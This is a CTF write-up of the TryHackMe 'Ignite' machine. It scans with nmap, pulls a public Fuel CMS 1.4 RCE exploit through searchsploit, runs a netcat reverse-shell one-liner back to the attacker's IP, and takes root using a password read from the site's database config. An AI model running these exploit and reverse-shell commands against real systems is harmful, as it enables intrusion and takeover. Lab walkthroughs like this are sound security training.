📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Reconnaissance
  • Enumeration
  • Privilege Escalation

Was this helpful?

  1. TryHackMe
  2. Challenges (CTF): Easy

Ignite

PreviousCrack The HashNextInclusion

Last updated 3 years ago

Was this helpful?

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.108.60

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 80

  • (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 80 -oN nmap 10.10.101.147

Enumeration

Lets visit the website

Its a guide on how to use Fuel CMS. In the nmap scan we saw a hidden directory called /fuel, lets visit that. It redirects us to this page.

Its a login page. At the moment we do not have credentials, so we cannot login. Lets go to searchsploit and search for exploits on this version of fuel CMS.

searchsploit fuel cms 1.4

We can see that there are two Remote code execution vulnerabilities, lets use one of them to exploit this machine. Lets copy this exploit to our directory.

searchsploit -m linux/webapps/47138.py

Looking through the exploit , we need to change the URL to the URL of the machine we are attacking.

After changing it, I ran the exploit.

python 47138.py
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Make sure to change the IP and start a netcat listener.

nc -lvnp 1234

Before running the command, lets remove all the unnecessary code in the exploit so that we do not get any errors if something that is not of our concern does not work.

Now lets run the command and run the reverse shell command, we get a shell.

Now we can read the flag.txt file.

Privilege Escalation

After looking around for a while, I went into the /var/www/html/fuel/application/config directory as config files are always interesting. One file that looked very interesting to me was the database.php file as I thought that I can find usernames and password in it.

cat database.php

And I did find the root password.

Now time to switch users to root.

su root

And we are now root, we can go read the root.txt flag.

We have remote code execution, now we can run commands from the victim machine. Lets run a reverse shell command to get a shell on the machine. We can find a reverse shell .

here